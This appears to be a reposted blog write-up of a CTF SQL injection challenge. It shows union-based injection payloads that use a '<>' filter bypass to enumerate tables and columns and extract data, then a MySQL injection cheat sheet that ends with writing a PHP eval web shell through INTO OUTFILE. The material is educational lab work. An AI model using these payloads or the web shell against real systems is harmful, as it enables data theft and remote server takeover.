"Baidu Cup" CTF game September Course Web-SQL

Visiting the challenge site

  • The page shows the hint flag{在数据库中} ("flag{in the database}"), and the URL xxx.ichunqiu.com/index.php?id=1 has the classic shape of a SQL injection point.

  • Viewing the page source as usual reveals the query SELECT * FROM info WHERE id=1, i.e. a numeric (unquoted) injection.

Finding the vulnerability

  • ?id=1 and 1=1 returns the message inj code!; a few more tests show that and, or, select and order are filtered.

  • A write-up by a more experienced player shows the way around it: insert <> in the middle of a filtered keyword, after which manual injection works as normal.

Getting the flag

  1. ?id=1 ord<> by 3: the page renders normally, so the query returns three columns.

  2. ?id=1 union sel<>ect 1,2,3: the value 2 is echoed, so the second column is the one displayed on the page.

  3. Get the database name
    ?id=1 union sel<>ect 1,database(),3: echoes the database name: sqli

  4. Get the table names
    ?id=1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database(): echoes the table names: info, users

  5. Get the column names
    ?id=1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info': echoes the columns: id, title, flAg_T5ZNdrm

  6. Get the flag
    ?id=1 union sel<>ect 1,flAg_T5ZNdrm,3 from info: echoes the flag.

Review of MySQL union select injection

  1. A union requires both queries to return the same number of columns, so first determine the column count with order by (e.g. four columns):
    order by 4

  2. Find which column positions are echoed on the page, i.e. where injected values become visible:
    union select 1,2,3,4

  3. Enumerate database information with the built-in functions and variables version(), database(), user() and @@global.version_compile_os:
    union select version(),database(),user(),@@global.version_compile_os

  4. Enumerate databases: MySQL > 5.0 ships the built-in information_schema database, which stores the structure of every database and table on the server.
    List the existing databases:
    union select 1,2,3,schema_name from information_schema.schemata

  5. Enumerate the tables of the current database:
    union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

  6. Enumerate the columns of a table (replace 表名 with the table name):
    union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='表名'

  7. Read the contents (replace 字段名 and 表名 with the column and table names):
    union select 1,2,3,字段名 from 表名 limit 0,1

  8. Writing a webshell (一句话木马) directly to disk
    Condition 1: the physical path of the site on disk is known
    Condition 2: the database account has sufficient privileges (writing files needs the FILE privilege)
    Condition 3: the PHP setting magic_quotes_gpc is off
    select '<?php eval($_POST[cmd]);?>' into outfile 'D:\\out.php'
    Note that on current MySQL versions the secure_file_priv setting confines or disables INTO OUTFILE, which is one of the reasons to keep it set in production.

================================================================

A beginner's learning notes; experienced players, please advise.


Source: blog.csdn.net/qq_34106499/article/details/103981930